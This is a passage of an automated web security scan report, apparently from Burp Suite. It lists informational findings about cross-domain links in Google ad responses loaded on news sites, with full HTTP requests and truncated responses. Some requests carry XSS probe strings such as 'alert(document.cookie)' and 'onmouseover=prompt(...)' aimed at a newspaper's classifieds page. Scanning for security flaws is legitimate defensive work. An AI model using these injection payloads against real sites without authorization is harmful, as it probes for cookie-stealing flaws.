<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.wptz.com/news/27483035/detail.html%26hl%3Den%26client%3Dca-pub-9793946255016312%26adU%3Dwww.NewUSAFunding.com%26adT%3D2011%2BGrant%2BApplications%26gl%3DUS&amp;usg=AFQjCNFe8fPcPfcojl0BYdauhP9aiqGUqw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
10.150. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5597875046540809&output=html&h=60&slotname=4254550909&w=468&lmt=1302639810&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fon-island.php&dt=1302621810889&bpp=3&shv=r20110406&jsv=r20110406&correlator=1302621810900&frm=0&adk=3184245769&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=282251794&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.mvtimes.com%2Farchives%2F&fu=0&ifi=1&dtd=16&xpc=lquyosTAHP&p=http%3A//www.mvtimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 12 Apr 2011 15:23:34 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4209

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mvtimes.com/marthas-vineyard/on-island.php%26hl%3Den%26client%3Dca-pub-5597875046540809%26adU%3Dwww.DavinciVirtual.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFz1bg8wrJd4AfoFiWpr7ZaBEex1A" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
10.151. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370796&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D465801&dt=1302352796416&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352796421&frm=0&adk=2815960337&ga_vid=54642498.1302352796&ga_sid=1302352796&ga_hid=1675332694&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&fu=0&ifi=1&dtd=8&xpc=3yUciFtoTL&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:59:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4357

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.wcax.com/Global/story.asp%253FS%253D465801%26hl%3Den%26client%3Dca-pub-2103553853082603%26adU%3Dwww.amu.apus.edu%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGtP_Ei4o7z1VFV1QQd675g_DiYMw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
10.152. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5597875046540809&output=html&h=250&slotname=6415844257&w=300&lmt=1302639838&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Farticle.php%3Fid%3D4030&dt=1302621838006&bpp=3&shv=r20110406&jsv=r20110406&prev_slotnames=2607287140&correlator=1302621837958&frm=0&adk=3606988145&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=2134607123&ga_fc=1&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fdirectory%2F%3Fa%3D1&fu=0&ifi=2&dtd=12&xpc=6xvwRKrm5c&p=http%3A//www.mvtimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 12 Apr 2011 15:24:02 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 7973

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mvtimes.com/marthas-vineyard/article.php%253Fid%253D4030%26hl%3Den%26client%3Dca-pub-5597875046540809%26adU%3Dwww.Dealfind.com/Chicago%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHO51DIw05xfyokhM-YsjmHe1iR_g" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
10.153. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5597875046540809&output=html&h=250&slotname=6415844257&w=300&lmt=1302639739&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fclassifieds%2F110.php%2F%2522onmouseover%3Dprompt(945581)%253E&dt=1302621737252&bpp=2&shv=r20110406&jsv=r20110406&prev_slotnames=7816900575&correlator=1302621738831&frm=0&adk=3606988145&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=2062115017&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&fu=0&ifi=2&dtd=2435&xpc=LGDcDNra2G&p=http%3A//www.mvtimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 12 Apr 2011 15:22:25 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4511

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.mvtimes.com/marthas-vineyard/classifieds/110.php/%252522onmouseover%253Dprompt(945581)%25253E%26hl%3Den%26client%3Dca-pub-5597875046540809%26adU%3Dwww.acquisio.com%26adT%3D%26gl%3DUS&amp;usg=AFQjCNHFocp2WwU1l3-YFWaEDC5ib0eVAw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
10.154. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370519&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&dt=1302352519646&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352519682&frm=0&adk=2815960337&ga_vid=445126576.1302352520&ga_sid=1302352520&ga_hid=1865664921&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&fu=0&ifi=1&dtd=239&xpc=om3s7OZYp6&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 09 Apr 2011 12:35:26 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13351

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.wcax.com/Global/category.asp%253FC%253D18963%26hl%3Den%26client%3Dca-pub-2103553853082603%26adU%3Dwww.Toyota.com/Safety%26adT%3DToyota%2BSafety%2BUpdates%26adU%3Dwww.LibertyMutual.com%26adT%3DLiberty%2BMutual%2BInsurance%26adU%3Dwww.ValleywideDriversEd.com/%26adT%3DChatsworth%2BDriving%2BSchool%26adU%3Dwww.AdamsDrivingSchool.com%26adT%3DDefensive%2BDriving%2BClass%26gl%3DUS&amp;usg=AFQjCNF1l38SXxjRcMnfGU39hOP83Xs6dg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
10.155. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5597875046540809&output=html&h=60&slotname=4254550909&w=468&lmt=1302639915&flash=10.2.154&url=http%3A%2F%2Fwww.mvtimes.com%2Fmarthas-vineyard%2Fclassifieds%2F110.php%2F%2522onmouseover302e4%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E2c94143d614%3Dprompt(945581)%253E&dt=1302621915312&bpp=4&shv=r20110406&jsv=r20110406&correlator=1302621915493&frm=0&adk=3184245769&ga_vid=1489843502.1302621734&ga_sid=1302621734&ga_hid=731217138&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fburp%2Fshow%2F4&fu=0&ifi=1&dtd=887&xpc=nYY6bFy6Ni&p=http%3A//www.mvtimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110409%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110409%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110409%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110409%3A1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 12 Apr 2011 15:25:20 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 9996

<style>body{margin:0;padding:0}</style><div id="google_flash_inline_div" style="position:relative;z-index:1001;width:468px"><div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="468" HEIGHT="60"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/TemplateContainer.swf">
...[SNIP]...
53DImageAd%2526gl%253DUS%26usg%3DAFQjCNESeHsehejoJETAe6No717c43FHlA&google_abg_img_url=http%3A//pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png&flash_element_id=google_flash_embed"><EMBED src="http://pagead2.googlesyndication.com/pagead/TemplateContainer.swf" id="google_flash_embed" WIDTH="468" HEIGHT="60" WMODE="opaque" FlashVars="google_xml_addata=%3CTEMPLATE_PARAMETERS%3E%3CNO_CONTAINER_XML/%3E%3CTEMPLATE_WIDTH%3E468%3C/TEMPLATE_WIDTH%3E%3CTEMPLATE_HEIGHT%3E60%3C/TEMPLATE_HEIGHT%3E%3CTEMPLATE_URL%3Ehttp%3A//pagead2.googlesyndication.com/pagead/gadgets/elegant_V9/elegant_V9_spec_468_60.swf%3C/TEMPLATE_URL%3E%3CTEMPLATE_AIT_URL%3Ehttp%3A//googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBBnOb4G6kTZ7xBMij6Qa-nciFCpWC7JEC5fzPox_AjbcB0MNCEAEYASCA2IICOABQ_86lz_7_____AWDJ7oOI8KPsErIBD3d3dy5tdnRpbWVzLmNvbboBCTQ2OHg2MF9hc8gBBNoBoQFodHRwOi8vd3d3Lm12dGltZXMuY29tL21hcnRoYXMtdmluZXlhcmQvY2xhc3NpZmllZHMvMTEwLnBocC8lMjJvbm1vdXNlb3ZlcjMwMmU0JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UyYzk0MTQzZDYxND1wcm9tcHQoOTQ1NTgxKSUzRYACAbgCGKgDAegDmgnoA7II6AOwKvUDAAQARPUDIAAAAA%26amp%3Bsigh%3D5j7b1niXufY%26amp%3Blabel%3D_AITNAME_%26amp%3Bvalue%3D_AITVALUE_%3C/TEMPLATE_AIT_URL%3E%3CTEMPLATE_ELEMENT+element_name%3D%22adData%22+index%3D%220%22%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFText%22%3EProperty+Condition+Survey%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextFont%22%3Eeurostyle_m%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextColor%22%3E0x333333%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFText%22%3E23points%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextFont%22%3Earial%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextColor%22%3E0xFFFFFF%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22product1MCImage%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCKnLlvWQtO67aBCVARhtMgia6HPQ7ijRdw%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22displayUrlColor%22%3E0x000000%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextFontName%22%3E_eurostyle_m%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1TFTextFontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCOTAwNrN6rvrxAEQ____________ARj___________8BMghVbwGNZ8acrg%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextFontName%22%3E_arial%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTFTextFontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCOTAwNrN6rvrxAEQ____________ARj___________8BMghVbwGNZ8acrg%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22displayUrl%22%3Ewww.23points.com%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22destinationUrl%22%3Ehttp%3A//www.23points.com%3C/TEMPLATE_FIELD%3E%3C/TEMPLATE_ELEMENT%3E%3C/TEMPLATE_PARAMETERS%3E&google_width=468&google_height=60&destination_url=http%3A//www.23points.com&display_url=www.23points.com&google_click_url=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBBnOb4G6kTZ7xBMij6Qa-nciFCpWC7JEC5fzPox_AjbcB0MNCEAEYASCA2IICOABQ_86lz_7_____AWDJ7oOI8KPsErIBD3d3dy5tdnRpbWVzLmNvbboBCTQ2OHg2MF9hc8gBBNoBoQFodHRwOi8vd3d3Lm12dGltZXMuY29tL21hcnRoYXMtdmluZXlhcmQvY2xhc3NpZmllZHMvMTEwLnBocC8lMjJvbm1vdXNlb3ZlcjMwMmU0JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UyYzk0MTQzZDYxND1wcm9tcHQoOTQ1NTgxKSUzRYACAbgCGKgDAegDmgnoA7II6AOwKvUDAAQARPUDIAAAAA%26num%3D1%26sig%3DAGiWqtyU_gmt5vi0otylIA76I5mJUVH3zA%26client%3Dca-pub-5597875046540809%26adurl%3D&google_ait_url=http%3A//googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBBnOb4G6kTZ7xBMij6Qa-nciFCpWC7JEC5fzPox_AjbcB0MNCEAEYASCA2IICOABQ_86lz_7_____AWDJ7oOI8KPsErIBD3d3dy5tdnRpbWVzLmNvbboBCTQ2OHg2MF9hc8gBBNoBoQFodHRwOi8vd3d3Lm12dGltZXMuY29tL21hcnRoYXMtdmluZXlhcmQvY2xhc3NpZmllZHMvMTEwLnBocC8lMjJvbm1vdXNlb3ZlcjMwMmU0JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0UyYzk0MTQzZDYxND1wcm9tcHQoOTQ1NTgxKSUzRYACAbgCGKgDAegDmgnoA7II6AOwKvUDAAQARPUDIAAAAA%26sigh%3D5j7b1niXufY%26label%3D_AITNAME_%26value%3D_AITVALUE_&google_target_in_new_window=true&google_abg_url=http%3A//www.google.com/url%3Fct%3Dabg%26q%3Dhttps%3A//www.google.com/adsense/support/bin/request.py%253Fcontact%253Dabg_afc%2526url%253Dhttp%3A//www.mvtimes.com/marthas-vineyard/classifieds/110.php/%25252522onmouseover302e4%25252522%2525253E%2525253Cscript%2525253Ealert(document.cookie)%2525253C/script%2525253E2c94143d614%25253Dprompt(945581)%2525253E%2526hl%253Den%2526client%253Dca-pub-5597875046540809%2526adU%253Dwww.23points.com%2526adT%253DImageAd%2526gl%253DUS%26usg%3DAFQjCNESeHsehejoJETAe6No717c43FHlA&google_abg_img_url=http%3A//pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png&flash_element_id=google_flash_embed" TYPE="application/x-shockwave-flash" AllowScriptAccess="always" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
10.156. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370791&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352790373&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352791028&frm=0&adk=2815960337&ga_vid=1677852705.1302352791&ga_sid=1302352791&ga_hid=1970402529&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=812&xpc=EGUpOMD3fC&p=http%3A//www.wcax.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
